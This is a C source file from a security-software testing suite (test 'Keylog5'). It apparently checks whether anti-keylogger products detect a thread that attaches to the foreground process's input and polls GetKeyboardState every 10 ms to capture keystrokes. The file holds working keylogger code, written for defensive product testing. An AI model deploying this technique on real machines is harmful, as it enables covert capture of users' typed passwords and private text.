/*

 Security Software Testing Suite - Keylog5 (spying test)
 Copyright by www.matousec.com, Different Internet Experience Ltd.
 http://www.matousec.com/


 Credits:

   * Based on the original idea of Anti-Keylogger Tester - GetKeyboardState test,
     written by Guillaume Kaddouch - http://www.firewallleaktester.com/aklt.htm.


 Method description:

   * Use AttachThreadInput API to attach a thread to a foreground process.

   * Every 10 miliseconds determine the state of the keyboard using GetKeyboardState API.

*/

#include <stdio.h>
#include <windows.h>
#include "include/common.h"
#include "include/common-hook.h"
#include "include/common-spy.h"


// the test specific constant which determines whether a key is being pressed
#define KEY_DOWN KEY_DOWN_BYTE


/*
 A thread routine which attachs its thread to foreground process and then it uses
 GetKeyboardState to find out which key is being pressed.
 This is polled every 10 miliseconds.

 'arg' A pointer to the spying tests structure.

 If the pattern was found the return value is TRUE, otherwise it is FALSE.
*/

DWORD WINAPI keylogging_thread_routine(PCOM_SPY_DATA kd)
{
  int done=FALSE;

  BYTE keyb_stat[KEY_CNT];
  BYTE keyb_stat_old[KEY_CNT];

  int attached=FALSE;
  DWORD pid=0;
  DWORD tid=GetCurrentThreadId();

  while (!done)
  {
    DWORD wres=WaitForSingleObject(kd->event,10);
    switch (wres)
    {
      case WAIT_TIMEOUT:
      {
        if (pid) AttachThreadInput(tid,pid,FALSE);
        HWND window=GetForegroundWindow();
        if (window)
        {
          pid=GetWindowThreadProcessId(window,NULL);
          if (pid)
          {
            attached=AttachThreadInput(tid,pid,TRUE);
            if (!attached)
            {
              com_err_set(kd->err_inf,"Unable to attach current thread to input of another one.\n");
              done=TRUE;
            }
          } else
          {
            com_err_set(kd->err_inf,"Unable to obtain process identifier from window handle.\n");
            done=TRUE;
          }
        }

        if (attached)
        {
          if (GetKeyboardState(keyb_stat))
          {
            for (int i=0;i<KEY_CNT;i++)
            {
              if ((keyb_stat[i] & KEY_DOWN) && (!keyb_stat_old[i]))
              {
                UINT chr_val=MapVirtualKey(i,2);
                char chr=LOBYTE(chr_val);

                done=com_spy_print_and_check_input(chr,kd);
              }

              keyb_stat_old[i]=(keyb_stat[i] & KEY_DOWN)!=0;
            }
          } else
          {
            com_err_set(kd->err_inf,"Unable to get state of keyboard.\n");
            done=TRUE;
          }
        }

        break;
      }

      case WAIT_OBJECT_0:
        done=TRUE;
        break;

      default:
        if (wres!=WAIT_FAILED) SetLastError(ERROR_SUCCESS);
        com_err_set(kd->err_inf,"Unknown error occurred, WaitForSingleObject returned %ld.\n",wres);

        done=TRUE;
        break;
    }
  }

  return kd->res;
}


int main(int argc,char **argv)
{
  COM_CONF conf;
  if (!com_console_init_main("Keylog5","keylog5",argc,argv,&conf,COM_TEST_TYPE_KEYLOG5)) return 1;

  char *used_dlls[]={"user32.dll"};
  if (!com_hook_load_libraries(used_dlls,1)) return 1;

  int res=FALSE;

  COM_ERROR err_inf;
  err_inf.occurred=FALSE;

  COM_SPY_DATA kd;
  if (com_spy_data_init(&kd,&conf,&err_inf))
  {

    HANDLE thread=CreateThread(NULL,0,(LPTHREAD_START_ROUTINE)keylogging_thread_routine,&kd,0,NULL);
    if (thread)
    {
      if (com_verbosity_get()) printf("Keylogging thread started.\n");

      printf("Press any key to exit.\n\nCaptured data:\n");

      if (!SetForegroundWindow(GetDesktopWindow()))
        printf("Unable to set foreground window, please switch to another window manually.\n");

      com_spy_wait(&kd,thread);

      CloseHandle(thread);
    } else com_err_set(&err_inf,"Unable to create thread.\n");

    res=kd.res;
    com_spy_data_finit(&kd);
  }

  return com_end(res,&err_inf,&conf);
}
